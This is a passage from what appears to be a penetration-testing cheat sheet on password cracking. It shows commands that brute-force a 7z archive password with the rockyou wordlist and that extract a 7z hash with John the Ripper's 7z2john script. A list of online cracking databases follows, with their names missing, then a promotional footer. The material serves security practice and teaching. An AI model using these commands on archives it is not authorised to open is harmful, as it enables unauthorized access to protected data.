cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z ``` ```bash #Download and install requirements for 7z2john wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl apt-get install libcompress-raw-lzma-perl ./7z2john.pl file.7z > 7zhash.john ``` *** ## Online cracking databases * (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value) * (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...) * (Hashes) * (MD5) * (Hashes and file hashes) * (Hashes) * (Hashes) * (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512) * (MD5) * Check this out before trying to brute force a Hash. *** {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)
Support VeryLazyTech 🎉 * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endhint %}